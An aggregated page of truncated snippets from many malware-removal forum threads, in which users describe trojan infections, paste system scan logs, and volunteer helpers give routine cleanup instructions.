It's become really slow and I've been having problems trying to access the internet/ Firefox as of late, as well as turning my anti virus systems off from time to time.
This happened about 3 days ago.
Please help!
Thank you.
(I have no logs to show yet, as I've no idea what to use to procure the scan)

A:HEUR/Modified.SystemFile trojan in user32.DLL

Please go here, follow steps six, seven and eight as best you can, and then start a new thread and post accordingly.
Please include a brief description of your problem in the new thread, just to keep everything in one place, and somebody will be along as soon as they can to help.
To keep things tidy i'll lock this thread.

1 more replies
Answer Match 51.24%

I keep telling KIS to quarantine this and it keeps find it when I do a full scan. I don't know if this has fixed it or not, I'm assuming not since KIS keeps finding it.
I'd appreciate any and all help, thanks y'all.
DDS (Ver_09-06-26.01) - NTFSx86
Run by HP_Administrator at 15:38:57.86 on Mon 07/27/2009
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_13
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.958.234 [GMT -4:00]

AV: Kaspersky Internet Security *On-access scanning enabled* (Updated) {2C4D4BC6-0793-4956-A9F9-E252435469C0}
FW: Kaspersky Internet Security *enabled* {2C4D4BC6-0793-4956-A9F9-E252435469C0}

============== Running Processes ===============

C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k WudfServiceGroup
svchost.exe
C:\WINDOWS\system32\spoolsv.exe
svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\WINDOWS\arservice.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\system32\CSHelper.exe
C:\Program Files\EarthLink TotalAccess\WENGINE\wmonitor.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS&#... Read more

A:Untreated: HEUR:Trojan.Win32.Generic

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

9 more replies
Answer Match 51.24%

Have Earthlink Protection Control Center which finds W32/Downloader but has no note for action. AVG has put two in virus vault this evening but more keep reappearing. AVG found viruses in svchost.exe, EPCC found virus in file A0392068.exe but I can't find it. Have done SAFE mode scans including Earthlink PCC, AVG, Spybot S&D, but more viruses kept showing up until I used a Restore point from two weeks ago and now just the few being found. Have XP Media Center Edition 2002 with SP2, Athlon 64 processor. Earthlink has kept Windows up to date. I mostly use Yahoo for email, and ocassionally use Outlook Express. IE6 and Firefox browsers. Here are logs . Please advise if I missed anything. Craig ------------------------------------------------------------------------------- KASPERSKY ONLINE SCANNER REPORT Tuesday, May 27, 2008 9:50:24 PM Operating System: Microsoft Windows XP Professional, Service Pack 2 (Build 2600) Kaspersky Online Scanner version: 5.0.98.0 Kaspersky Anti-Virus database last update: 27/05/2008 Kaspersky Anti-Virus database records: 802914-------------------------------------------------------------------------------Scan Settings: Scan using the following antivirus database: extended Scan Archives: true Scan Mail Bases: trueScan Target - Critical Areas: C:\WINDOWS C:\DOCUME~1\Owner\LOCALS~1\Temp\Scan Statistics: Total number of scanned objects: 29084 Number of viruses found: 2 Number of infected objects: 2 Number of suspicious o... Read more

A:Win 32/heur; Trojan Horse Downloader.generic7.csf

Welcome to Bleeping Computer, please be sure you have read and followed the Preparation Guide For Use Before Posting A Hijackthis Log, Instructions for receiving help in cleaning your computer http://www.bleepingcomputer.com/forums/t/34773/preparation-guide-for-use-before-using-malware-removal-tools-and-requesting-help/All advice given is taken at your own risk.I apologize for the wait, if your issues are not resolved, read the instructions posted above and then follow the directions below. If you no longer need help, I would appreciate a quick post letting me know so I can close your topic.If you still need help, I first need to make you aware you have a very dangerous backdoor trojan showing in this HJT log:Logfile of Trend Micro HijackThis v2.0.2 Scan saved at 9:54:53 PM, on 5/27/2008 O4 - HKLM\..\Run: [Microsoft Updates] svehost.exe O4 - HKLM\..\RunServices: [Microsoft Updates] svehost.exehttp://www.castlecops.com/startuplist-15211.htmlhttp://www.sophos.com/security/analyses/vi...w32rbotgrw.html W32/Rbot-GRW includes functionality to access the internet and communicate with a remote server via HTTPBecause of this I believe you should have this information:How Do I Handle Possible Identify Theft, Internet Fraud and CC Fraud? http://www.dslreports.com/faq/10451When Should I Format, How Should I Reinstallhttp://www.dslreports.com/faq/10063I need to know what exactly: The EarthLink Protection Control Center provides?I am seeing this: Advanced Antivirus, Firewall, SpywareBlo... Read more

8 more replies
Answer Match 51.24%

My antivirus "Kaspersky" caught this trojan and said it was inactive. I am trying to learn how to remove it and I had heard you guys were WONDERFUL!! at helping people do this sort of thing.
I appreciate any help you can give me with this as it's my first time dealing with this monster!!

Thanks,
Pat
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 7:42:35 PM, on 6/9/2012
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v9.00 (9.00.8112.16421)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe
C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Program Files (x86)\Common Files\Apple\Internet Services\ubd.exe
C:\Users\owner\AppData\Roaming\Smilebox\SmileboxTray.exe
C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe
C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\QLBCTRL.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\avp.exe
C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
C:\Program Files (x86)\Hewlett-Packard\Shared\hpqToaster.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exe
C:\Program Files (x86)\H... Read more

A:HEUR:Trojan.Script.Iframer Removal

14 more replies
Answer Match 51.24%

Redirection when opening internet explorer, haven't used much since recieving virus trying not to lose my files.

DDS (Ver_09-02-01.01) - NTFSx86
Run by Daddy at 21:00:25.14 on Thu 02/26/2009
Internet Explorer: 7.0.5730.13
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1015.493 [GMT -5:00]

AV: BitDefender Antivirus *On-access scanning enabled* (Updated)
FW: BitDefender Firewall *enabled*

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k WudfServiceGroup
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
svchost.exe
svchost.exe
C:\WINDOWS\System32\wltrysvc.exe
C:\WINDOWS\System32\bcmwltry.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Common Files\InterVideo\DeviceService\DevSvc.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\WINDOWS\system32\svchost.exe -k hpdevmgmt
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe
C:\Program Files\Intel\Wireless\Bin\ZcfgSvc.exe
C:\WINDOWS\System32\svchost.exe -k HPZ12
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\svchost.exe -k HPZ12
C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe
svchost.exe
C:\WINDOWS\... Read more

A:Gen:Trojan.Heur.25/ Microsoft security disabled

Hello and Welcome to TSF.

Please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.

Please note that the forum is very busy and if I don't hear from you within three days this thread will be closed.

------------------------------------------------------

While Spybot's TeaTimer is an excellent tool for the prevention of spyware, it can sometimes prevent tools from fixing certain things.
Please disable TeaTimer for now until you are clean. TeaTimer can be re-activated once your HijackThis log is clean.Open Spybot Search & Destroy.
In the Mode menu click "Advanced mode" if not already selected.
Choose "Yes" at the Warning prompt.
Expand the "Tools" menu.
Click "Resident".
Uncheck the "Resident "TeaTimer" (Protection of overall system settings) active." box.
If TeaTimer gives you a warning that changes were made, click the "Allow Change" box when prompted.
In the File menu click "Exit" to exit Spybot Search & Destroy.
------------------------------------------------------
Click on the attached ResetTeaTimer.zip file located at the bottom of this post.
Save it to your Desktop.
Double-click ResetTeaTimer.zip
Double-click ResetTeaTimer.bat and click Run to remove all entries set by TeaTimer... Read more

5 more replies
Answer Match 51.24%

I included my post from the 'Am I Infected' section below in blue, it details what I've tried and the error msg, kaspersky notifications I'm receiving. Here is my HiJack log: Logfile of Trend Micro HijackThis v2.0.2Scan saved at 1:11:02 PM, on 8/4/2007Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v7.00 (7.00.5730.0011)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\System32\wltrysvc.exeC:\WINDOWS\System32\bcmwltry.exeC:\WINDOWS\system32\brsvc01a.exeC:\WINDOWS\system32\spoolsv.exeC:\WINDOWS\system32\brss01a.exeC:\server\Apache2\bin\Apache.exeC:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\avp.exeC:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXEC:\Program Files\Microsoft SQL Server\MSSQL$MICROSOFTBCM\Binn\sqlservr.exeC:\server\Apache2\bin\Apache.exeC:\server\mysql\bin\mysqld-nt.exeC:\WINDOWS\Explorer.EXEC:\Program Files\Dell\NICCONFIGSVC\NICCONFIGSVC.exeC:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWi... Read more

A:Trojan-spy.win32.montp.h, Heur.invader, Etc

Welcome to the BleepingComputer HijackThis Logs and Analysis forum rhennessy My name is Richie and i'll be helping you to fix your problems.Please move HijackThis to a permanent folder on the hard drive such as C:\HJT. Create a new folder and place your HijackThis.exe inside that folder so that the backups of log changes it creates are saved in the same folder and can be used to reverse any line entry deletion if found to be necessary.If you run Hijackthis from the desktop, the files it removes will not be backed up properly.How to create a new folder named HJT1. Click Start/My Computer,in the 'My Computer' window,open the window in which you want to create the new folder,click on Local Disk C:2. From the 'File' menu choose 'New'.3. From the 'New' menu choose 'Folder'.4. Type the folder name: HJT5. Then press Enter.----------------------------------------------Viewpoint Manager is considered as foistware instead of malware since it is installed without users approval but doesn't spy or do anything "bad". This will change from what we know in 2006 read this article: http://www.clickz.com/news/article.php/3561546You are well advised to remove the program now. Go to Start > Settings > Control Panel > Add/Remove Programs and remove the following programs if present:ViewpointViewpoint ManagerViewpoint Media PlayerThen restart your pc.----------------------------------------------Your version of Sun Java is out of date.Older versions have vulnerabiliti... Read more

7 more replies
Answer Match 51.24%

Hello. About a week ago, my mom told me her laptop was being extremely slow. I ran a few virus scans and found HEUR:Trojan.Win32.Generic with Kaspersky's scanner. Interestingly enough, kaspersky won't remove it. Now I am at a loss at what to do because the computer and internet loads very slowly. The internet connection (which used to be solid) works for awhile, then does not work for a while, then works etc.

**I tried to use gmer.exe, but when i ran it the first time, i got the blue screen, and whenever i ran it after, it crashed.**

DDS (Ver_09-03-16.01) - NTFSx86
Run by ak at 17:54:41.71 on Thu 05/07/2009
Internet Explorer: 7.0.6000.16830 BrowserJavaVersion: 1.6.0_13
Microsoft? Windows Vista? Home Basic 6.0.6000.0.1252.1.1033.18.894.108 [GMT -7:00]

AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated)
AV: Kaspersky Anti-Virus *On-access scanning enabled* (Outdated)

============== Running Processes ===============

C:\Windows\system32\wininit.exe
C:\Program Files\AVG\AVG8\avgrsx.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\system32\Ati2evxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\Ati2evxx.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe... Read more

A:Infected - HEUR:Trojan.Win32.Generic

Hello and Welcome to TSF.

Please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.

Please note that the forum is very busy and if I don't hear from you within three days this thread will be closed.

------------------------------------------------------

I need to see a rootkit scan before I can help you.

Download RootRepeal.zip to your Desktop and click 'Extract all files' to extract the compressed file to it's own folder.
Double-click on RootRepeal.exe to run it.
Click on the 'Report' tab, and then click on 'Scan'.
A window opens asking what to include in the scan.
Check the following boxes then click 'OK':
Drivers
Files
Processes
SSDT
Stealth Objects
Hidden Services You will then be asked which drive to scan.
Check C: (or the drive your operating system is installed on, if not C:)
Click 'OK' once again.
The tool will begin scanning and may take a while to complete, so please be patient.
When the scan finishes, click on 'Save Report'.
Save the log to your desktop, using a distinctive name, such as RootRepeal.txt.
Post the log in your next reply.
------------------------------------------------------

4 more replies
Answer Match 51.24%

Hello, I need help. I am trying to fix my Dell Inspirion netbook it is infected with this virus. iexplorer.exe it is running even when I don't have internet explorer open. I have tried running malwarebytes, superantispyware, kaspersky virus removal tool(thats what found the Heur:Trojan.win32.generic). It will disconnect me from my wireless internet, runs slow, some popups, and when I am on the internet I get redirected. I don't know what to do, from what Iread its pretty nasty rootkit and hidden very well. I have also noticed a wierd folder in my C:\Drive it is "153929ecde1b450a6e2bea79cd3c" It also has sub folders of amd64 and i386. I don't remember it being there before but I guess it coud of been. I am also getting iexplore errors every 5-10min as well. Please Help!!!
I am running winxp

A:Iexplorer.exe and Heur:trojan.win32.Generic

Somebody please help me

2 more replies
Answer Match 51.24%

HI

i was running an antivirus scan and was shown a warning that i have a win32/heur infection. i googled how to get rid of it and was led to this site. i've noticed that the drivers for my touchpad mouse keep getting removed and some other background programs occaisionally fail for no apparent reason. I couldn't figure out how to shut off either norton internet security or avg anti virus software for my dds scan. I also have windows 7 home student, i'm not sure whether or not its 32 or 64 bit but i couldn't figure out the gmer thing either.
 Attach.txt   6.33KB
  1 downloads here is my dds.scr log

thank you for helping me out,
let me know if you need more

.
DDS (Ver_11-03-05.01) - NTFS_AMD64
Run by Cullen at 22:45:47.03 on 28/03/2011
Internet Explorer: 8.0.7600.16385
Microsoft Windows 7 Home Premium 6.1.7600.0.1252.2.1033.18.8046.5207 [GMT -7:00]
.
AV: Norton Internet Security *Enabled/Updated* {63DF5164-9100-186D-2187-8DC619EFD8BF}
AV: AVG Anti-Virus 2011 *Enabled/Updated* {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}
SP: AVG Anti-Virus 2011 *Enabled/Updated* {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Norton Internet Security *Enabled/Updated* {D8BEB080-B73A-17E3-1B37-B6B462689202}
FW: Norton Internet Security *Enabled* {5BE4D041-DB6F-1935-0AD8-24F3E73C9FC4}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.e... Read more

A:infected with win32/heur trojan malware

Hello toehead,i was running an antivirus scan and was shown a warning that i have a win32/heur infection.Which AV reported this infection, and where does it show it located at? Did it try to clean it for you?

1 more replies
Answer Match 51.24%

About a month or so ago, my computer started running really slow. I thought maybe it might just be an outdated add-on for Firefox (the browser I use), but I noticed that the slowness wasn't just happening when the browser was open. I leave my PC on when I go to bed, and noticed that when I would wake up, and then wake the computer up, it would take forever for the desktop to appear. It seemed to have cleared up about a week and a half ago. I just recently bought a used gaming steering wheel from a friend in Washington state. It came this past Tuesday. So I plugged it in, and installed the software and drivers, no problem. Then, I decided to run DriverMax and update the rest of my drivers. Once I restarted my computer, I found that my wireless adapter said I had a full connection, and excellent signal strength. When I opened Firefox however, it said "web page can not be displayed". I tried Internet Explorer, same deal. I ran every security scanning program I have, and Advanced SystemCare was the only one that found the Trojan. The weird thing is, it found it in my video drivers at the following location:
C:\NVIDIA\DisplayDriver\285.38\Winvista_Win7_64\English\setup.exe

I manually deleted the file. I still have no internet connection though. I've tried every trick I could think of, and find on the internet. Still no luck. I've come to the conclusion that I've had the Trojan for this last whole month or so,... Read more

A:Infected with Trojan.Heur & No Browser Connectiong

Hello Ernde38,Welcome to the forum.Please refrain from doing any fix or making any changes to the system from now on until we are done unless you decide you can do the rest on your own. Thank you.If you have still the issue please update me on the current condition of the computer and do the following.Please download Farbar Service Scanner and run it on the computer with the issue.Check all the boxes.Press "Scan".It will create a log (FSS.txt) in the same directory the tool is run.Please copy and paste the log to your reply.Please download MiniToolBox and save it to your desktop and run it.

Checkmark following checkboxes:
Flush DNSReport IE Proxy SettingsReset IE Proxy SettingsReport FF Proxy SettingsReset FF Proxy SettingsList content of HostsList IP configurationList Winsock EntriesList last 10 Event Viewer logList installed programs.List Devices (only check the box and let the default radio button as it is).List Restore Points.Click Go and post the result (Result.txt) that pops up. A copy of result.txt will be saved in the same directory the tool is run.

11 more replies
Answer Match 51.24%

I started my computer the other day and everything seemed to be good, than I noticed and recognized the startup and login sound happened again  None of my installed scanners( Norton360 or MBAM) picked up anything.  I used Kaspersky Rescue Disk 10 and found a threat called:  HEUR.Trojan.Win32.Generic. This looks to be attached to /.../Spybot-Spyware-Doctor.Install.rw.exe I suspect that this is the cause of my problems or possibly just a part of a lager one. I also cannot find this file in the Explorer Window or by searching for it with CLI. Need help with removal, most scanners that I have tried are not finding any security threats.
 
Thanks in advance!

A:Infected: HEUR.Trojan.Win32.Generic

Hello, I see this is reported by Kaspersky to be a false positive under certain conditions..I recommend taking a a deeper look. Please follow this Preparation Guide, do steps 6,7 and 8 and post in a new topic.Let me know if all went well.

3 more replies
Answer Match 51.24%

I just have this one lingering infection.
HEUR:Trojan-Downloader.Win32.Generic

Kaspersky always identifies it at the start up and is able to delete it but for some apparent reason, it can't fully get rid of it. It appears every time I start up the PC. I will post a picture of the log.

Not sure what the aswMBR scan log is, if you elaborate I have no problem uploading it or downloading the program to get you it!
Help a brotha out!
Thank you.

-Hugo
 

A:HEUR:Trojan-Downloader.Win32.Generic

I should add that I have also completely disinfected google chrome. Unfortunately it deleted all my bookmarks, maybe someone has a method of recuperating?

AND if all comes to worse, I should also add that I have the free Windows 10 upgrade available to me. I just haven't installed it or found the need to do it.

Thanks!
 

1 more replies
Answer Match 51.24%

HOW I GOT IT:

Really stupid actually. I downloaded a file called "update.exe" from a video website requesting to update my codec from a sketchy popup. Normally red flags would fly in my head but I was running on fumes and was extremely tired. I d/l and actually checked it with bit defender and it gave the green light that the file was clean. Opened it, then bit defender went off and said Trojan.Heur was discovered and Bit Defender couldn't do anything about it (no quarantine, deletion or anything). Anyway the file I downloaded disappeared and I suspected the possibility of having it so I ran a full system scan and deep system scan overnight.

Woke up the next morning to check on the results and immediately my screen went blue screen of death, saying I needed a memory dump to prevent more damage .. . .blah blah . . . IRQ_EQUAL_TO . . . something . . .

SYMPTOMS:

After rebooting, my 1 Tb usb removable hard drive had no partition, and it asked me to format.

Then tried to search "heur" in google and a bunch of results came up that when I clicked on the ones regarding trojan information, lead me to websites that weren't related to the link at all (ie. looking for trojan information and shopping site came up - very spyware and adware like).

After a necessary reboot, bitdefender no longer is on the system icon tray upon bootup. I also have Malwarebytes Anti-Malware on the system icon tray but I can't double click on it to open it.

Just ran CCleaner... Read more

A:Trojan.Heur? - Bit defender detected but no action possible

Hello! My name is Sam and I will be helping you. In order to see what's going on with your computer I will ask for you to post various logs from the tools that we will use to resolve your issue. Please also share with me any information about how your computer is reacting and behaving each step of the way as we work through this process.We need to create an OTListIt2 ReportPlease download OTListIt2 from hereSave it to your desktop.Double click on the icon on your desktop.Click the "Scan All Users" checkbox.Push the "Run Scan" button.The scan should take just a few minutes.Copy the log that opens up and paste it back here in your next reply.=============The next log will show us any hidden files that are present.Download GMER from here:Unzip it to the desktop.Open the program and click on the Rootkit tab.Make sure all the boxes on the right of the screen are checked, EXCEPT for ?Show All?.Click on Scan.When the scan has run click Copy and paste the results (if any) into this thread.

16 more replies
Answer Match 51.24%

I changed my harddrive and tried to install Win 10. There were (and still is) drivers missing but I tried to install Win 10 anyway. Installation stopped after 5-6 hours multiple times + restored the operating system back to original Win 7. I went trough many guides how to deal with the installation problem, but none helped. I tried to install drivers from hp, but there were every time some kind of failure which caused the installation to stop. So I installed trial of Kapersky, and it found the trojan mentioned on topic, but it were unable to remove it. After that I installed Spyhunter according to some advice, but it did not clean it without money. I thought 100 eur was too much for uncertain removal attempt. So I installed hijackthis, but I did not have enough fate to auto-fix everything it suggested since there were important-sounding stuff on the list.
 
Would you please help me to get this out of my system
 
Kind regards,
 
Marko Virtanen

More replies
Answer Match 51.24%

My Windows firewall has been taken down and disabled.

Restore points appear, but when I tried a System Restore, I got an error message.

My Trend Micro anti-virus no longer works and cannot be started manually.

I downloaded the Kaspersky Virus/Malware removal tool. It found and quarantined two files labeled "Trojan program HEUR:backdoor.win32.generic.

DDS text follows:

.
DDS (Ver_2011-08-26.01) - NTFSx86
Internet Explorer: 8.0.6001.18702
Run by Harry at 16:30:59 on 2012-07-26
.
============== Running Processes ===============
.
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.nbcnews.com/
uInternet Settings,ProxyOverride = *.local
BHO: Adobe PDF Link Helper: {18df081c-e8ad-4283-a596-fa578c2ebdc3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelperShim.dll
BHO: TmIEPlugInBHO Class: {1ca1377b-dc1d-4a52-9585-6e06050fac53} - c:\program files\trend micro\amsp\module\20004\2.0.1313\6.8.1078\TmIEPlg.dll
BHO: Java(tm) Plug-In SSV Helper: {761497bb-d6f0-462c-b6eb-d4daf1d92d43} - c:\program files\java\jre1.6.0_07\bin\ssv.dll
BHO: TmBpIeBHO Class: {bbacbafd-fa5e-4079-8b33-00eb9f13d4ac} - c:\program files\trend micro\amsp\module\20002\7.1.1102\7.1.1102\TmBpIe32.dll
uRun: [Steam] "e:\program files\steam\steam.exe" -silent
uRun: [SB Audigy 2 Startup Menu] "c:\program files\creative\sbaudigy2zs\program\startup menu\ChkColor.EXE"
uRun: [ISUSPM] "c:\program files\common files\installshi... Read more

A:Trojan Program HEUR:backdoor.win.32.generic

I checked System Restore again: there are no restore points available.

Harry

13 more replies
Answer Match 51.24%

I use windows xp sp2
I am protected by kaspersky internet security 2009
Kaspersky detects this trojan win32 generic, removes it and the next time I run a scan it detects the same things again

what do I do?

help
 

More replies
Answer Match 50.4%

This is the logfile. A virus alert pops up next to the clock on the task bar saying, 'Virus Alert', various pop ups randomly activate indicating a virus, and my background wall paper has been replaced with a red bio-hazard sign stating, 'Download Piracy Protection Software Now'. Notebook is also going slow.

Any help will be appreciated. Here are the logs from HijackThis.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 20:04: VIRUS ALERT!, on 8/28/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\system32\CTsvcCDA.exe
C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\system32\wscntfy.exe
C:\PROGRA~1\MOZILL~1\FIREFOX.EXE
C:\Program Files\NETGEAR\WG511v2\WG511v2.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Common Files\Micr... Read more

A:Please help! Infected with Win32.Zlob and Heur.Trojan.Generic

Bump
 

1 more replies
Answer Match 50.4%

Somehow this virus made it onto my computer getting past the new 2011 Kaspersky, well now it has disabled my virus protection and I need a little help. The name of the file it is re duplicating over and over is: heuewd.sys
I managed to get into Safe mode and run the AVS utility and this is what it shows, I also ran 2 other utilities showing similar results. The problem is that the virus is locked and it will not erase, it just re-duplicates itself.

Attention !!! Database was last updated 11/23/2010 it is necessary to update the database (via File - Database update)
AVZ Antiviral Toolkit log; AVZ version is 4.36 private build
Scanning started at 08.12.2010 20:12:17
Database loaded: signatures - 282657, NN profile(s) - 2, malware removal microprograms - 56, signature database released 23.11.2010 14:50
Heuristic microprograms loaded: 386
PVS microprograms loaded: 9
Digital signatures of system files loaded: 245853
Heuristic analyzer mode: Medium heuristics mode
Malware removal mode: disabled
Windows version is: 6.0.6002, Service Pack 2 ; AVZ is run with administrator rights
System Restore: enabled
System booted in Safe Mode with Networking
1. Searching for Rootkits and other software intercepting API functions
1.1 Searching for user-mode API hooks
Analysis: kernel32.dll, export table found in section .text
Analysis: ntdll.dll, export table found in section .text
Analysis: user32.dll, export table found in section .text
Analysis: advapi32.dll, export table found in ... Read more

A:Cannot Remove virus HEUR.trojan.win32 generic

Hello and welcome to Bleeping Computer We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review your topic an do their best to resolve your issues.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Follow the instructions that pop up for post... Read more

2 more replies
Answer Match 50.4%

My normally dependable Dell,i5, Win 7, laptop suddenly began to be erratic, booting at odd times
and showing strange, inappropriate errror messages. A number of antivirus programs either can't load or can't
run properly. I ran Kaspersky Security Scan and it reported the HEUR trojan, said "index (2) htm" was malware
along with several entries it said were incorrect.

I could sure use some help with this. Any assistance will be greatly appreciated.

DDS (Ver_2012-10-19.01) - NTFS_AMD64
Internet Explorer: 9.0.8112.16421 BrowserJavaVersion: 10.7.2
Run by norm at 14:31:26 on 2012-10-18
Microsoft Windows 7 Home Premium 6.1.7600.0.1252.1.1033.18.3893.1668 [GMT -7:00]
.
AV: AVG Anti-Virus Free Edition 2012 *Disabled/Updated* {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}
AV: Avira Desktop *Enabled/Updated* {F67B4DE5-C0B4-6C3F-0EFF-6C83BD5D0C2C}
SP: Avira Desktop *Enabled/Updated* {4D1AAC01-E68E-63B1-344F-57F1C6DA4691}
SP: AVG Anti-Virus Free Edition 2012 *Disabled/Updated* {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -... Read more

A:Kaspersky reports HEUR:Trojan.Script.Generic

